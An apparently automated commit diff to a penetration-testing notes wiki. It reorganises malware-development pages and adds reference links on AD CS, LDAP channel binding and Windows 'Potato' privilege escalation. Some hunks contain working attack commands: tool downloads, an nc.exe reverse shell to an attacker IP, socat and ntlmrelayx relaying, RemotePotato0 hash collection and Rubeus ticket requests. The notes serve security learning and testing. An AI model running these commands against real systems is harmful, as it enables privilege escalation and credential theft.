[AHK] Automatic update 👽

SUMMARY.md

@@ -27,16 +27,6 @@
       - [CLM Bypass](pentest/infrastructure/ad/av-edr-evasion/clm-bypass.md)
       - [Defender](pentest/infrastructure/ad/av-edr-evasion/defender.md)
       - [Execution Policy Bypass](pentest/infrastructure/ad/av-edr-evasion/executionpolicy-bypass.md)
-      - [Malware Development]((pentest/infrastructure/ad/av-edr-evasion/maldev/README.md))
-        * [Code Injection](pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/README.md)
-          - [DLL Injectors](pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/dll-injectors.md)
-          - [Process Hollowing](pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/process-hollowing.md)
-          - [Process Injectors](pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/process-injectors.md)
-          - [Shellcode Runners](pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/shellcode-runners.md)
-        * [D/Invoke](pentest/infrastructure/ad/av-edr-evasion/maldev/dinvoke.md)
-        * [Nim](pentest/infrastructure/ad/av-edr-evasion/maldev/nim.md)
-        * [Syscalls](pentest/infrastructure/ad/av-edr-evasion/maldev/syscalls.md)
-        * [Windows API](pentest/infrastructure/ad/av-edr-evasion/maldev/winapi.md)
       - [Mimikatz](pentest/infrastructure/ad/av-edr-evasion/mimikatz.md)
       - [UAC Bypass](pentest/infrastructure/ad/av-edr-evasion/uac-bypass.md)
     * [Authentication Coercion](pentest/infrastructure/ad/authentication-coercion.md)
@@ -177,6 +167,17 @@
 * [Basics](redteam/basics.md)
 * [Cobalt Strike](redteam/cobalt-strike.md)
 * [Infrastructure](redteam/infrastructure.md)
+* [Malware Development](redteam/maldev/README.md)
+  - [Code Injection](redteam/maldev/code-injection/README.md)
+    * [DLL Injectors](redteam/maldev/code-injection/dll-injectors.md)
+    * [Process Hollowing](redteam/maldev/code-injection/process-hollowing.md)
+    * [Process Injectors](redteam/maldev/code-injection/process-injectors.md)
+    * [Shellcode Runners](redteam/maldev/code-injection/shellcode-runners.md)
+  - [D/Invoke](redteam/maldev/dinvoke.md)
+  - [Nim](redteam/maldev/nim.md)
+  - [Shellcodes](redteam/maldev/shellcodes.md)
+  - [Syscalls](redteam/maldev/syscalls.md)
+  - [Windows API](redteam/maldev/winapi.md)
 
 ## Admin
 

docs/README.md

@@ -624,7 +624,7 @@ PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbo
 
 Check:
 
-* [https://twitter.com/\_wald0/status/1091062691383238656](https://twitter.com/_wald0/status/1091062691383238656)
+* [https://twitter.com/_wald0/status/1091062691383238656](https://twitter.com/_wald0/status/1091062691383238656)
 
 ```
 $ sudo ./Responder.py -I eth0 -Av
@@ -646,7 +646,7 @@ $ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.3
 **CVE-2020-1472**
 
 * [https://www.secura.com/uploads/whitepapers/Zerologon.pdf](https://www.secura.com/uploads/whitepapers/Zerologon.pdf)
-* [https://twitter.com/\_dirkjan/status/1306280566313156608](https://twitter.com/_dirkjan/status/1306280566313156608)
+* [https://twitter.com/_dirkjan/status/1306280566313156608](https://twitter.com/_dirkjan/status/1306280566313156608)
 
 Check:
 

pentest/infrastructure/ad/README.md

@@ -52,7 +52,7 @@ chmod +x BloodHound
 sudo mkdir /usr/share/neo4j/logs/
 
 mkdir -p ~/.config/bloodhound
-curl -sSL https://github.com/ShutdownRepo/Exegol/raw/master/sources/bloodhound/customqueries.json > /tmp/customqueries1.json
+curl -sSL https://github.com/ShutdownRepo/Exegol-images/raw/main/sources/bloodhound/customqueries.json > /tmp/customqueries1.json
 curl -sSL https://github.com/CompassSecurity/BloodHoundQueries/raw/master/customqueries.json > /tmp/customqueries2.json
 curl -sSL https://github.com/ZephrFish/Bloodhound-CustomQueries/raw/main/customqueries.json > /tmp/customqueries3.json
 curl -sSL https://github.com/ly4k/Certipy/raw/main/customqueries.json > /tmp/customqueries4.json
@@ -77,7 +77,7 @@ with open(Path.home() / '.config' / 'bloodhound' / 'customqueries.json', 'w') as
 EOT
 
 rm /tmp/customqueries*.json
-downloadRawFile "https://github.com/ShutdownRepo/Exegol/raw/master/sources/bloodhound/config.json" ~/.config/bloodhound/config.json
+downloadRawFile "https://github.com/ShutdownRepo/Exegol-images/raw/main/sources/bloodhound/config.json" ~/.config/bloodhound/config.json
 sed -i 's/"password": "exegol4thewin"/"password": "WeaponizeK4li!"/g' ~/.config/bloodhound/config.json
 ```
 

pentest/infrastructure/ad/ad-cs-abuse/README.md

@@ -402,7 +402,8 @@ PS > .\Certify.exe download /ca:CA01.megacorp.local\CorpCA /id:1337
 
 ## Audit
 
-* [https://github.com/GhostPack/PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
+- [https://github.com/GhostPack/PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
+- [https://github.com/TrimarcJake/adcs-snippets](https://github.com/TrimarcJake/adcs-snippets)
 
 ```
 PS > Get-WindowsCapability -Online -Name "Rsat.*" | where Name -match "CertificateServices|ActiveDIrectory" | Add-WindowsCapability -Online
@@ -483,3 +484,11 @@ Search for vulnerable certificate templates:
 ```
 $ certi.py list megacorp.local/snovvcrash -k -n --dc-ip 192.168.1.11 --vuln --enable
 ```
+
+
+
+### PassTheCert
+
+- [https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html](https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html)
+- [https://github.com/AlmondOffSec/PassTheCert](https://github.com/AlmondOffSec/PassTheCert)
+- [https://twitter.com/_nwodtuhs/status/1451510341041594377](https://twitter.com/_nwodtuhs/status/1451510341041594377)

pentest/infrastructure/ad/authentication-coercion.md

@@ -1,12 +1,12 @@
 # Authentication Coercion
 
 {% hint style="info" %}
-It's a good idea to check if **NTLMv1 downgrade** is possible when triggering the callbacks:
+It's a good idea to check if **NTLMv1 downgrade** is possible when triggering the callbacks.
+{% endhint %}
 
 {% content-ref url="/pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md" %}
 [ntlmv1-downgrade.md](ntlmv1-downgrade.md)
 {% endcontent-ref %}
-{% endhint %}
 
 
 

pentest/infrastructure/ad/ldap.md

@@ -94,7 +94,9 @@ $ python3 LdapRelayScan.py -method BOTH -dc-ip 192.168.1.11 -u snovvcrash -p 'Pa
 
 
 
-### LDAP Signing & Channel Binding
+### LDAP Signing & LDAP Channel Binding
+
+- [https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html](https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html)
 
 | Property Name                                                                                                                                                                   | Property Path                                            |
 |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|

pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md

@@ -9,6 +9,11 @@ Client sends NTLMv1 response when `LmCompatibilityLevel` exists and is `2` or lo
 | [LmCompatibilityLevel](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level) | `HKLM\SYSTEM\CurrentControlSet\Control\Lsa`        |
 | [NtlmMinClientSec](http://systemmanager.ru/win2k_regestry.en/85673.htm)                                                                                                | `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0` |
 
+
+
+
+## Check
+
 Check with PowerShell:
 
 ```
@@ -20,18 +25,23 @@ PS > $hexValue
 0x20
 ```
 
-Check with [Seatbelt](https://github.com/GhostPack/Seatbelt/blob/fa0f2d94a049d825bef77e103e33167250ed2ac0/Seatbelt/Commands/Windows/NtlmSettingsCommand.cs#L149) ([ex](https://0xdf.gitlab.io/2021/04/10/htb-apt.html#seatbelt)):
+Check with [Seatbelt](https://github.com/GhostPack/Seatbelt/blob/fa0f2d94a049d825bef77e103e33167250ed2ac0/Seatbelt/Commands/Windows/NtlmSettingsCommand.cs#L149) ([example](https://0xdf.gitlab.io/2021/04/10/htb-apt.html#seatbelt)):
 
 ```
 Cmd > .\Seatbelt.exe NTLMSettings
 ```
 
-Exploit with Responder with a known challenge of `1122334455667788` (see **Authentication Coercion** to trigger callbacks):
+
+
+
+## Exploit
 
 {% content-ref url="/pentest/infrastructure/ad/authentication-coercion.md" %}
 [authentication-coercion.md](authentication-coercion.md)
 {% endcontent-ref %}
 
+Exploit with Responder with a known challenge of `1122334455667788` (see **Authentication Coercion** to trigger callbacks):
+
 ```
 $ sudo python Responder.py -I eth0 -v --lm --disable-ess
 ```

pentest/infrastructure/ad/password-spraying.md

@@ -35,12 +35,12 @@ Example of `net accounts` output:
 
 ### Non-Authenticated
 
-If SMB null sessions are allowed on the DC, an adversary can get a list of all domain users via **RID Cycling**:
-
 {% content-ref url="/pentest/infrastructure/ad/rid-cycling.md" %}
 [rid-cycling.md](rid-cycling.md)
 {% endcontent-ref %}
 
+If SMB null sessions are allowed on the DC, an adversary can get a list of all domain users via **RID Cycling**.
+
 
 
 ### Authenticated

pentest/infrastructure/ad/privileges-abuse/seimpersonateprivilege/potatoes.md

@@ -1,16 +1,14 @@
 # Potatoes
 
-* [https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)
-* [https://github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato)
+- [https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)
 
 
 
 
 ## RottenPotato
 
-* [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
-* [https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/](https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/)
-* [https://github.com/foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato)
+- [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
+- [https://github.com/foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato)
 
 ```
 $ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
@@ -26,16 +24,18 @@ meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
 
 ## LonelyPotato
 
-* [https://decoder.cloud/2017/12/23/the-lonely-potato/](https://decoder.cloud/2017/12/23/the-lonely-potato/)
+- [https://decoder.cloud/2017/12/23/the-lonely-potato/](https://decoder.cloud/2017/12/23/the-lonely-potato/)
+- [https://github.com/decoder-it/lonelypotato](https://github.com/decoder-it/lonelypotato)
 
 
 
 
 ## JuicyPotato
 
-* [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases)
-* [https://github.com/ivanitlearning/Juicy-Potato-x86/releases](https://github.com/ivanitlearning/Juicy-Potato-x86/releases)
-* [https://ohpe.it/juicy-potato/CLSID](https://ohpe.it/juicy-potato/CLSID)
+- [https://ohpe.it/juicy-potato/](https://ohpe.it/juicy-potato/)
+- [https://ohpe.it/juicy-potato/CLSID/](https://ohpe.it/juicy-potato/CLSID/)
+- [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases)
+- [https://github.com/ivanitlearning/Juicy-Potato-x86/releases](https://github.com/ivanitlearning/Juicy-Potato-x86/releases)
 
 ```
 $ curl -L https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe > j.exe
@@ -53,12 +53,13 @@ Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windo
 
 ## RoguePotato
 
-* [https://github.com/antonioCoco/RoguePotato/releases](https://github.com/antonioCoco/RoguePotato/releases)
+- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
+- [https://github.com/antonioCoco/RoguePotato/releases](https://github.com/antonioCoco/RoguePotato/releases)
 
 Redirect traffic that comes to 135 port on Attacker (`10.10.13.37`) with `socat` back to the Victim (`192.168.1.11`) on port 9999 (RogueOxidResolver is running locally on port 9999 on Victim):
 
 ```
-$ socat tcp-listen:135,reuseaddr,fork tcp:192.168.1.11:9999
+$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9999
 ```
 
 Trigger the potato to run a binary with high privileges (don't forget to start a listener if sending a reverse shell):
@@ -72,39 +73,53 @@ Cmd > .\RoguePotato.exe -r 10.10.13.37 -e "C:\windows\Temp\nc.exe 10.10.13.37 44
 
 ## RemotePotato0
 
-* [https://github.com/antonioCoco/RemotePotato0/releases](https://github.com/antonioCoco/RemotePotato0/releases)
+- [https://www.sentinelone.com/labs/relaying-potatoes-another-unexpected-privilege-escalation-vulnerability-in-windows-rpc-protocol/](https://www.sentinelone.com/labs/relaying-potatoes-another-unexpected-privilege-escalation-vulnerability-in-windows-rpc-protocol/)
+- [https://github.com/antonioCoco/RemotePotato0/releases](https://github.com/antonioCoco/RemotePotato0/releases)
 
-Cross-protocol relay:
+Get session ID of the user to pwn:
 
 ```
-$ sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
-$ sudo ntlmrelayx.py -t ldap://192.168.1.11 --no-wcf-server --escalate-user snovvcrash
 Cmd > query user
+Cmd > quser
+```
+
+Hashes collector (modes 2, 3):
+
+```
+$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
+Cmd > .\RemotePotato0.exe -m 2 -x 10.10.13.37 -p 9998 -s 5
+```
+
+Cross-protocol relay (modes 0, 1):
+
+```
+$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
+$ sudo ntlmrelayx.py -t ldap://192.168.1.11 --no-smb-server --no-wcf-server --no-raw-server --escalate-user snovvcrash
 Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5
 ```
 
-Combining with ESC8:
+[Combining](https://twitter.com/0xcsandker/status/1430111652008112131) with ESC8:
 
 ```
 $ sudo ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-wcf-server --adcs --template User
 Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5 -c "{f8842f8e-dafe-4b37-9d38-4e0714a61149}"
-PS > .\Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
+Cmd > .\Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
 ```
 
 
 
 
 ## GenericPotato
 
-* [https://micahvandeusen.com/the-power-of-seimpersonation/](https://micahvandeusen.com/the-power-of-seimpersonation/)
-* [https://github.com/micahvandeusen/GenericPotato](https://github.com/micahvandeusen/GenericPotato)
+- [https://micahvandeusen.com/the-power-of-seimpersonation/](https://micahvandeusen.com/the-power-of-seimpersonation/)
+- [https://github.com/micahvandeusen/GenericPotato](https://github.com/micahvandeusen/GenericPotato)
 
 
 
 
 ## EfsPotato
 
-* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
+- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
 
 
 

pentest/infrastructure/networks/l2/dhcp-poisoning.md

@@ -11,3 +11,4 @@ description: Dynamic Host Configuration Protocol
 
 - [https://g-laurent.blogspot.com/2021/08/responders-dhcp-poisoner.html](https://g-laurent.blogspot.com/2021/08/responders-dhcp-poisoner.html)
 - [https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning)
+- [https://luemmelsec.github.io/Relaying-101/](https://luemmelsec.github.io/Relaying-101/)

redteam/cobalt-strike.md

@@ -200,7 +200,7 @@ beacon> mimikatz dpapi::cred /in:C:\Users\snovvcrash\AppData\Local\Microsoft\Cre
 
 ### Sleep Mask
 
-{% content-ref url="/pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/README.md#shellcode-in-memory-fluctuation" %}
+{% content-ref url="/redteam/maldev/code-injection/README.md#shellcode-in-memory-fluctuation-obfuscate-and-sleep" %}
 [ntlmv1-downgrade.md](ntlmv1-downgrade.md)
 {% endcontent-ref %}